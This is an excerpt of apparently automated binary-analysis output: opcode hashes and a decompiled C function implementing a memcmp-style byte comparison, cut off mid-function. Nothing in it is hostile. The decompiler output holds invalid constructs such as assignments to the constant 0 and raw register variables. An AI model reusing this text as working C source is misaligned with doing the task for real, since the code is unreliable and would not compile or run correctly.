                  • Opcode ID: a545bb6e8d73443cc3055ca63858aa6e9b251feb1f4c254a53afe7fa4f829b5b
                  • Instruction ID: 3f50da8734beb60df7d555487da1896ed512a488fb775def19aa41af8a46c9ae
                  • Opcode Fuzzy Hash: a545bb6e8d73443cc3055ca63858aa6e9b251feb1f4c254a53afe7fa4f829b5b
                  • Instruction Fuzzy Hash: A49002B02513405A8B1027705C4D60635D19E4861375208726019D44E4EB644094659A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00420038(signed char* _a4, signed char* _a8, signed int _a12) {
                  				signed int _t984;
                  				void* _t986;
                  				signed int _t988;
                  				void* _t989;
                  				void* _t991;
                  				void* _t993;
                  				void* _t994;
                  				void* _t996;
                  				void* _t998;
                  				void* _t1001;
                  				void* _t1003;
                  				void* _t1005;
                  				signed char* _t1006;
                  				void* _t1007;
                  				signed int _t1140;
                  				signed char* _t1144;
                  				signed char* _t1145;
                  				signed char* _t1146;
                  				signed char* _t1147;
                  				void* _t1173;
                  				signed int _t1174;
                  				void* _t1175;
                  				signed char* _t1176;
                  				signed char* _t1177;
                  				signed char* _t1178;
                  				void* _t1188;
                  				void* _t1190;
                  				void* _t1192;
                  				void* _t1195;
                  				void* _t1197;
                  				void* _t1199;
                  				void* _t1202;
                  				void* _t1204;
                  				void* _t1206;
                  				void* _t1209;
                  				void* _t1211;
                  				void* _t1213;
                  				void* _t1216;
                  				void* _t1218;
                  				void* _t1220;
                  				void* _t1223;
                  				void* _t1225;
                  				void* _t1227;
                  				void* _t1230;
                  				void* _t1232;
                  				void* _t1234;
                  				void* _t1237;
                  				void* _t1239;
                  				void* _t1241;
                  
                  				_t1174 = _a12;
                  				_t984 = _t1174;
                  				if(_t984 == 0) {
                  					return 0;
                  				}
                  				_t986 = _t984 - 1;
                  				if(_t986 == 0) {
                  					_t988 =  *_a4 & 0x000000ff;
                  					_t1140 =  *_a8 & 0x000000ff;
                  					L426:
                  					_t989 = _t988 - _t1140;
                  					if(_t989 == 0) {
                  						L438:
                  						return _t989;
                  					}
                  					return (0 | _t989 > 0x00000000) + (0 | _t989 > 0x00000000) - 1;
                  				}
                  				_t991 = _t986 - 1;
                  				if(_t991 == 0) {
                  					_t1144 = _a4;
                  					_t1176 = _a8;
                  					_t993 = ( *_t1144 & 0x000000ff) - ( *_t1176 & 0x000000ff);
                  					if(_t993 == 0) {
                  						L435:
                  						_t988 = _t1144[1] & 0x000000ff;
                  						_t1140 = _t1176[1] & 0x000000ff;
                  						goto L426;
                  					}
                  					_t989 = (0 | _t993 > 0x00000000) + (0 | _t993 > 0x00000000) - 1;
                  					if(_t989 != 0) {
                  						goto L438;
                  					}
                  					goto L435;
                  				}
                  				_t994 = _t991 - 1;
                  				if(_t994 == 0) {
                  					_t1145 = _a4;
                  					_t1177 = _a8;
                  					_t996 = ( *_t1145 & 0x000000ff) - ( *_t1177 & 0x000000ff);
                  					if(_t996 == 0) {
                  						L430:
                  						_t998 = (_t1145[1] & 0x000000ff) - (_t1177[1] & 0x000000ff);
                  						if(_t998 == 0) {
                  							L432:
                  							_t988 = _t1145[2] & 0x000000ff;
                  							_t1140 = _t1177[2] & 0x000000ff;
                  							goto L426;
                  						}
                  						_t989 = (0 | _t998 > 0x00000000) + (0 | _t998 > 0x00000000) - 1;
                  						if(_t989 != 0) {
                  							goto L438;
                  						}
                  						goto L432;
                  					}
                  					_t989 = (0 | _t996 > 0x00000000) + (0 | _t996 > 0x00000000) - 1;
                  					if(_t989 != 0) {
                  						goto L438;
                  					}
                  					goto L430;
                  				}
                  				if(_t994 == 1) {
                  					_t1146 = _a4;
                  					_t1178 = _a8;
                  					_t1001 = ( *_t1146 & 0x000000ff) - ( *_t1178 & 0x000000ff);
                  					if(_t1001 == 0) {
                  						L421:
                  						_t1003 = (_t1146[1] & 0x000000ff) - (_t1178[1] & 0x000000ff);
                  						if(_t1003 == 0) {
                  							L423:
                  							_t1005 = (_t1146[2] & 0x000000ff) - (_t1178[2] & 0x000000ff);
                  							if(_t1005 == 0) {
                  								L425:
                  								_t988 = _t1146[3] & 0x000000ff;
                  								_t1140 = _t1178[3] & 0x000000ff;
                  								goto L426;
                  							}
                  							_t989 = (0 | _t1005 > 0x00000000) + (0 | _t1005 > 0x00000000) - 1;
                  							if(_t989 != 0) {
                  								goto L438;
                  							}
                  							goto L425;
                  						}
                  						_t989 = (0 | _t1003 > 0x00000000) + (0 | _t1003 > 0x00000000) - 1;
                  						if(_t989 != 0) {
                  							goto L438;
                  						}
                  						goto L423;
                  					}
                  					_t989 = (0 | _t1001 > 0x00000000) + (0 | _t1001 > 0x00000000) - 1;
                  					if(_t989 != 0) {
                  						goto L438;
                  					}
                  					goto L421;
                  				} else {
                  					_t1147 = _a8;
                  					_t1006 = _a4;
                  					_t1173 = 0x20;
                  					while(_t1174 >= _t1173) {
                  						if( *_t1006 ==  *_t1147) {
                  							_t1175 = 0;
                  							L16:
                  							if(_t1175 != 0) {
                  								L98:
                  								_t1007 = _t1175;
                  								L178:
                  								return _t1007;
                  							}
                  							if(_t1006[4] == _t1147[4]) {
                  								_t1175 = 0;
                  								L27:
                  								if(_t1175 != 0) {
                  									goto L98;
                  								}
                  								if(_t1006[8] == _t1147[8]) {
                  									_t1175 = 0;
                  									L38:
                  									if(_t1175 != 0) {
                  										goto L98;
                  									}
                  									if(_t1006[0xc] == _t1147[0xc]) {
                  										_t1175 = 0;
                  										L49:
                  										if(_t1175 != 0) {
                  											goto L98;
                  										}
                  										if(_t1006[0x10] == _t1147[0x10]) {
                  											_t1175 = 0;
                  											L60:
                  											if(_t1175 != 0) {
                  												goto L98;
                  											}
                  											if(_t1006[0x14] == _t1147[0x14]) {
                  												_t1175 = 0;
                  												L71:
                  												if(_t1175 != 0) {
                  													goto L98;
                  												}
                  												if(_t1006[0x18] == _t1147[0x18]) {
                  													_t1175 = 0;
                  													L82:
                  													if(_t1175 != 0) {
                  														goto L98;
                  													}
                  													if(_t1006[0x1c] == _t1147[0x1c]) {
                  														_t1175 = 0;
                  														L93:
                  														if(_t1175 != 0) {
                  															goto L98;
                  														} else {
                  															_t1006 =  &(_t1006[_t1173]);
                  															_t1147 =  &(_t1147[_t1173]);
                  															_t1174 = _t1174 - _t1173;
                  															continue;
                  														}
                  													}
                  													_t1188 = (_t1006[0x1c] & 0x000000ff) - (_t1147[0x1c] & 0x000000ff);
                  													if(_t1188 == 0) {
                  														L86:
                  														_t1190 = (_t1006[0x1d] & 0x000000ff) - (_t1147[0x1d] & 0x000000ff);
                  														if(_t1190 == 0) {
                  															L88:
                  															_t1192 = (_t1006[0x1e] & 0x000000ff) - (_t1147[0x1e] & 0x000000ff);
                  															if(_t1192 == 0) {
                  																L90:
                  																_t1175 = (_t1006[0x1f] & 0x000000ff) - (_t1147[0x1f] & 0x000000ff);
                  																if(_t1175 != 0) {
                  																	_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  																}
                  																goto L93;
                  															}
                  															_t1175 = (0 | _t1192 > 0x00000000) + (0 | _t1192 > 0x00000000) - 1;
                  															if(_t1175 != 0) {
                  																goto L98;
                  															}
                  															goto L90;
                  														}
                  														_t1175 = (0 | _t1190 > 0x00000000) + (0 | _t1190 > 0x00000000) - 1;
                  														if(_t1175 != 0) {
                  															goto L98;
                  														}
                  														goto L88;
                  													}
                  													_t1175 = (0 | _t1188 > 0x00000000) + (0 | _t1188 > 0x00000000) - 1;
                  													if(_t1175 != 0) {
                  														goto L98;
                  													}
                  													goto L86;
                  												}
                  												_t1195 = (_t1006[0x18] & 0x000000ff) - (_t1147[0x18] & 0x000000ff);
                  												if(_t1195 == 0) {
                  													L75:
                  													_t1197 = (_t1006[0x19] & 0x000000ff) - (_t1147[0x19] & 0x000000ff);
                  													if(_t1197 == 0) {
                  														L77:
                  														_t1199 = (_t1006[0x1a] & 0x000000ff) - (_t1147[0x1a] & 0x000000ff);
                  														if(_t1199 == 0) {
                  															L79:
                  															_t1175 = (_t1006[0x1b] & 0x000000ff) - (_t1147[0x1b] & 0x000000ff);
                  															if(_t1175 != 0) {
                  																_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  															}
                  															goto L82;
                  														}
                  														_t1175 = (0 | _t1199 > 0x00000000) + (0 | _t1199 > 0x00000000) - 1;
                  														if(_t1175 != 0) {
                  															goto L98;
                  														}
                  														goto L79;
                  													}
                  													_t1175 = (0 | _t1197 > 0x00000000) + (0 | _t1197 > 0x00000000) - 1;
                  													if(_t1175 != 0) {
                  														goto L98;
                  													}
                  													goto L77;
                  												}
                  												_t1175 = (0 | _t1195 > 0x00000000) + (0 | _t1195 > 0x00000000) - 1;
                  												if(_t1175 != 0) {
                  													goto L98;
                  												}
                  												goto L75;
                  											}
                  											_t1202 = (_t1006[0x14] & 0x000000ff) - (_t1147[0x14] & 0x000000ff);
                  											if(_t1202 == 0) {
                  												L64:
                  												_t1204 = (_t1006[0x15] & 0x000000ff) - (_t1147[0x15] & 0x000000ff);
                  												if(_t1204 == 0) {
                  													L66:
                  													_t1206 = (_t1006[0x16] & 0x000000ff) - (_t1147[0x16] & 0x000000ff);
                  													if(_t1206 == 0) {
                  														L68:
                  														_t1175 = (_t1006[0x17] & 0x000000ff) - (_t1147[0x17] & 0x000000ff);
                  														if(_t1175 != 0) {
                  															_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  														}
                  														goto L71;
                  													}
                  													_t1175 = (0 | _t1206 > 0x00000000) + (0 | _t1206 > 0x00000000) - 1;
                  													if(_t1175 != 0) {
                  														goto L98;
                  													}
                  													goto L68;
                  												}
                  												_t1175 = (0 | _t1204 > 0x00000000) + (0 | _t1204 > 0x00000000) - 1;
                  												if(_t1175 != 0) {
                  													goto L98;
                  												}
                  												goto L66;
                  											}
                  											_t1175 = (0 | _t1202 > 0x00000000) + (0 | _t1202 > 0x00000000) - 1;
                  											if(_t1175 != 0) {
                  												goto L98;
                  											}
                  											goto L64;
                  										}
                  										_t1209 = (_t1006[0x10] & 0x000000ff) - (_t1147[0x10] & 0x000000ff);
                  										if(_t1209 == 0) {
                  											L53:
                  											_t1211 = (_t1006[0x11] & 0x000000ff) - (_t1147[0x11] & 0x000000ff);
                  											if(_t1211 == 0) {
                  												L55:
                  												_t1213 = (_t1006[0x12] & 0x000000ff) - (_t1147[0x12] & 0x000000ff);
                  												if(_t1213 == 0) {
                  													L57:
                  													_t1175 = (_t1006[0x13] & 0x000000ff) - (_t1147[0x13] & 0x000000ff);
                  													if(_t1175 != 0) {
                  														_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  													}
                  													goto L60;
                  												}
                  												_t1175 = (0 | _t1213 > 0x00000000) + (0 | _t1213 > 0x00000000) - 1;
                  												if(_t1175 != 0) {
                  													goto L98;
                  												}
                  												goto L57;
                  											}
                  											_t1175 = (0 | _t1211 > 0x00000000) + (0 | _t1211 > 0x00000000) - 1;
                  											if(_t1175 != 0) {
                  												goto L98;
                  											}
                  											goto L55;
                  										}
                  										_t1175 = (0 | _t1209 > 0x00000000) + (0 | _t1209 > 0x00000000) - 1;
                  										if(_t1175 != 0) {
                  											goto L98;
                  										}
                  										goto L53;
                  									}
                  									_t1216 = (_t1006[0xc] & 0x000000ff) - (_t1147[0xc] & 0x000000ff);
                  									if(_t1216 == 0) {
                  										L42:
                  										_t1218 = (_t1006[0xd] & 0x000000ff) - (_t1147[0xd] & 0x000000ff);
                  										if(_t1218 == 0) {
                  											L44:
                  											_t1220 = (_t1006[0xe] & 0x000000ff) - (_t1147[0xe] & 0x000000ff);
                  											if(_t1220 == 0) {
                  												L46:
                  												_t1175 = (_t1006[0xf] & 0x000000ff) - (_t1147[0xf] & 0x000000ff);
                  												if(_t1175 != 0) {
                  													_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  												}
                  												goto L49;
                  											}
                  											_t1175 = (0 | _t1220 > 0x00000000) + (0 | _t1220 > 0x00000000) - 1;
                  											if(_t1175 != 0) {
                  												goto L98;
                  											}
                  											goto L46;
                  										}
                  										_t1175 = (0 | _t1218 > 0x00000000) + (0 | _t1218 > 0x00000000) - 1;
                  										if(_t1175 != 0) {
                  											goto L98;
                  										}
                  										goto L44;
                  									}
                  									_t1175 = (0 | _t1216 > 0x00000000) + (0 | _t1216 > 0x00000000) - 1;
                  									if(_t1175 != 0) {
                  										goto L98;
                  									}
                  									goto L42;
                  								}
                  								_t1223 = (_t1006[8] & 0x000000ff) - (_t1147[8] & 0x000000ff);
                  								if(_t1223 == 0) {
                  									L31:
                  									_t1225 = (_t1006[9] & 0x000000ff) - (_t1147[9] & 0x000000ff);
                  									if(_t1225 == 0) {
                  										L33:
                  										_t1227 = (_t1006[0xa] & 0x000000ff) - (_t1147[0xa] & 0x000000ff);
                  										if(_t1227 == 0) {
                  											L35:
                  											_t1175 = (_t1006[0xb] & 0x000000ff) - (_t1147[0xb] & 0x000000ff);
                  											if(_t1175 != 0) {
                  												_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  											}
                  											goto L38;
                  										}
                  										_t1175 = (0 | _t1227 > 0x00000000) + (0 | _t1227 > 0x00000000) - 1;
                  										if(_t1175 != 0) {
                  											goto L98;
                  										}
                  										goto L35;
                  									}
                  									_t1175 = (0 | _t1225 > 0x00000000) + (0 | _t1225 > 0x00000000) - 1;
                  									if(_t1175 != 0) {
                  										goto L98;
                  									}
                  									goto L33;
                  								}
                  								_t1175 = (0 | _t1223 > 0x00000000) + (0 | _t1223 > 0x00000000) - 1;
                  								if(_t1175 != 0) {
                  									goto L98;
                  								}
                  								goto L31;
                  							}
                  							_t1230 = (_t1006[4] & 0x000000ff) - (_t1147[4] & 0x000000ff);
                  							if(_t1230 == 0) {
                  								L20:
                  								_t1232 = (_t1006[5] & 0x000000ff) - (_t1147[5] & 0x000000ff);
                  								if(_t1232 == 0) {
                  									L22:
                  									_t1234 = (_t1006[6] & 0x000000ff) - (_t1147[6] & 0x000000ff);
                  									if(_t1234 == 0) {
                  										L24:
                  										_t1175 = (_t1006[7] & 0x000000ff) - (_t1147[7] & 0x000000ff);
                  										if(_t1175 != 0) {
                  											_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  										}
                  										goto L27;
                  									}
                  									_t1175 = (0 | _t1234 > 0x00000000) + (0 | _t1234 > 0x00000000) - 1;
                  									if(_t1175 != 0) {
                  										goto L98;
                  									}
                  									goto L24;
                  								}
                  								_t1175 = (0 | _t1232 > 0x00000000) + (0 | _t1232 > 0x00000000) - 1;
                  								if(_t1175 != 0) {
                  									goto L98;
                  								}
                  								goto L22;
                  							}
                  							_t1175 = (0 | _t1230 > 0x00000000) + (0 | _t1230 > 0x00000000) - 1;
                  							if(_t1175 != 0) {
                  								goto L98;
                  							}
                  							goto L20;
                  						}
                  						_t1237 = ( *_t1006 & 0x000000ff) - ( *_t1147 & 0x000000ff);
                  						if(_t1237 == 0) {
                  							L9:
                  							_t1239 = (_t1006[1] & 0x000000ff) - (_t1147[1] & 0x000000ff);
                  							if(_t1239 == 0) {
                  								L11:
                  								_t1241 = (_t1006[2] & 0x000000ff) - (_t1147[2] & 0x000000ff);
                  								if(_t1241 == 0) {
                  									L13:
                  									_t1175 = (_t1006[3] & 0x000000ff) - (_t1147[3] & 0x000000ff);
                  									if(_t1175 != 0) {
                  										_t1175 = (0 | _t1175 > 0x00000000) + (0 | _t1175 > 0x00000000) - 1;
                  									}
                  									goto L16;
                  								}
                  								_t1175 = (0 | _t1241 > 0x00000000) + (0 | _t1241 > 0x00000000) - 1;
                  								if(_t1175 != 0) {
                  									goto L98;
                  								}
                  								goto L13;
                  							}
                  							_t1175 = (0 | _t1239 > 0x00000000) + (0 | _t1239 > 0x00000000) - 1;
                  							if(_t1175 != 0) {
                  								goto L98;
                  							}
                  							goto L11;
                  						}
                  						_t1175 = (0 | _t1237 > 0x00000000) + (0 | _t1237 > 0x00000000) - 1;
                  						if(_t1175 != 0) {
                  							goto L98;
                  						}
                  						goto L9;
                  					}
                  					if(_t1174 > 0x1f) {
                  						L177:
                  						_t1007 = 0;
                  						goto L178;
                  					}
                  					switch( *((intOrPtr*)(_t1174 * 4 +  &M00421638))) {
                  						case 0:
                  							goto L177;
                  						case 1:
                  							L256:
                  							__ecx =  *(__ecx - 1) & 0x000000ff;
                  							__eax =  *(__eax - 1) & 0x000000ff;
                  							__eax = __eax - __ecx;
                  							if(__eax != 0) {
                  								0 = 0 | __eax > 0x00000000;
                  								__ecx = (__eax > 0) + (__eax > 0) - 1;
                  								__eax = (__eax > 0) + (__eax > 0) - 1;
                  							}
                  							goto L178;
                  						case 2:
                  							L335:
                  							if( *(__eax - 2) ==  *(__ecx - 2)) {
                  								goto L177;
                  							}
                  							goto L336;
                  						case 3:
                  							L416:
                  							__esi =  *(__eax - 3) & 0x000000ff;
                  							__edx =  *(__ecx - 3) & 0x000000ff;
                  							__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                  							if(__esi == 0) {
                  								L336:
                  								__edx =  *(__ecx - 2) & 0x000000ff;
                  								__esi =  *(__eax - 2) & 0x000000ff;
                  								__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                  								if(__esi == 0) {
                  									goto L256;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								if(__edx != 0) {
                  									L418:
                  									__eax = __edx;
                  									goto L178;
                  								}
                  								goto L256;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							if(__edx == 0) {
                  								goto L336;
                  							}
                  							goto L418;
                  						case 4:
                  							L165:
                  							__edx =  *(__eax - 4);
                  							if( *(__eax - 4) ==  *(__ecx - 4)) {
                  								__eax = 0;
                  								L176:
                  								if(__eax != 0) {
                  									goto L178;
                  								}
                  								goto L177;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 4) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                  							if(__esi == 0) {
                  								L168:
                  								__esi =  *(__eax - 3) & 0x000000ff;
                  								__edx =  *(__ecx - 3) & 0x000000ff;
                  								__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                  								if(__esi == 0) {
                  									L170:
                  									__esi =  *(__eax - 2) & 0x000000ff;
                  									__edx =  *(__ecx - 2) & 0x000000ff;
                  									__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                  									if(__esi == 0) {
                  										L173:
                  										__eax =  *(__eax - 1) & 0x000000ff;
                  										__eax = __eax - __ecx;
                  										if(__eax != 0) {
                  											0 = 0 | __eax > 0x00000000;
                  											__ecx = (__eax > 0) + (__eax > 0) - 1;
                  											__eax = (__eax > 0) + (__eax > 0) - 1;
                  										}
                  										goto L176;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									if(__edx == 0) {
                  										goto L173;
                  									}
                  									L172:
                  									__eax = __edx;
                  									goto L176;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								if(__edx != 0) {
                  									goto L172;
                  								}
                  								goto L170;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							if(__edx != 0) {
                  								goto L172;
                  							}
                  							goto L168;
                  						case 5:
                  							L245:
                  							__edx =  *(__eax - 5);
                  							if( *(__eax - 5) ==  *(__ecx - 5)) {
                  								__esi = 0;
                  								L255:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L256;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 5) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                  							if(__esi == 0) {
                  								L248:
                  								__esi =  *(__eax - 4) & 0x000000ff;
                  								__edx =  *(__ecx - 4) & 0x000000ff;
                  								__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                  								if(__esi == 0) {
                  									L250:
                  									__esi =  *(__eax - 3) & 0x000000ff;
                  									__edx =  *(__ecx - 3) & 0x000000ff;
                  									__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                  									if(__esi == 0) {
                  										L252:
                  										__esi =  *(__eax - 2) & 0x000000ff;
                  										__edx =  *(__ecx - 2) & 0x000000ff;
                  										__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L255;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L252;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L250;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L248;
                  						case 6:
                  							L324:
                  							__edx =  *(__eax - 6);
                  							if( *(__eax - 6) ==  *(__ecx - 6)) {
                  								__esi = 0;
                  								L334:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L335;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 6) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                  							if(__esi == 0) {
                  								L327:
                  								__esi =  *(__eax - 5) & 0x000000ff;
                  								__edx =  *(__ecx - 5) & 0x000000ff;
                  								__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                  								if(__esi == 0) {
                  									L329:
                  									__esi =  *(__eax - 4) & 0x000000ff;
                  									__edx =  *(__ecx - 4) & 0x000000ff;
                  									__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                  									if(__esi == 0) {
                  										L331:
                  										__esi =  *(__eax - 3) & 0x000000ff;
                  										__edx =  *(__ecx - 3) & 0x000000ff;
                  										__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L334;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L331;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L329;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L327;
                  						case 7:
                  							L405:
                  							__edx =  *(__eax - 7);
                  							if( *(__eax - 7) ==  *(__ecx - 7)) {
                  								__esi = 0;
                  								L415:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L416;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 7) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                  							if(__esi == 0) {
                  								L408:
                  								__esi =  *(__eax - 6) & 0x000000ff;
                  								__edx =  *(__ecx - 6) & 0x000000ff;
                  								__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                  								if(__esi == 0) {
                  									L410:
                  									__esi =  *(__eax - 5) & 0x000000ff;
                  									__edx =  *(__ecx - 5) & 0x000000ff;
                  									__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                  									if(__esi == 0) {
                  										L412:
                  										__esi =  *(__eax - 4) & 0x000000ff;
                  										__edx =  *(__ecx - 4) & 0x000000ff;
                  										__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L415;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L412;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L410;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L408;
                  						case 8:
                  							L154:
                  							__edx =  *(__eax - 8);
                  							if( *(__eax - 8) ==  *(__ecx - 8)) {
                  								__esi = 0;
                  								L164:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L165;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 8) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                  							if(__esi == 0) {
                  								L157:
                  								__esi =  *(__eax - 7) & 0x000000ff;
                  								__edx =  *(__ecx - 7) & 0x000000ff;
                  								__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                  								if(__esi == 0) {
                  									L159:
                  									__esi =  *(__eax - 6) & 0x000000ff;
                  									__edx =  *(__ecx - 6) & 0x000000ff;
                  									__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                  									if(__esi == 0) {
                  										L161:
                  										__esi =  *(__eax - 5) & 0x000000ff;
                  										__edx =  *(__ecx - 5) & 0x000000ff;
                  										__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L164;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L161;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L159;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L157;
                  						case 9:
                  							L234:
                  							__edx =  *(__eax - 9);
                  							if( *(__eax - 9) ==  *(__ecx - 9)) {
                  								__esi = 0;
                  								L244:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L245;
                  							}
                  							__edx =  *(__ecx - 9) & 0x000000ff;
                  							__esi =  *(__eax - 9) & 0x000000ff;
                  							__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                  							if(__esi == 0) {
                  								L237:
                  								__esi =  *(__eax - 8) & 0x000000ff;
                  								__edx =  *(__ecx - 8) & 0x000000ff;
                  								__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                  								if(__esi == 0) {
                  									L239:
                  									__esi =  *(__eax - 7) & 0x000000ff;
                  									__edx =  *(__ecx - 7) & 0x000000ff;
                  									__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                  									if(__esi == 0) {
                  										L241:
                  										__esi =  *(__eax - 6) & 0x000000ff;
                  										__edx =  *(__ecx - 6) & 0x000000ff;
                  										__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L244;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L241;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L239;
                  							}
                  							0 = 0 | __esi > 0x00000000;
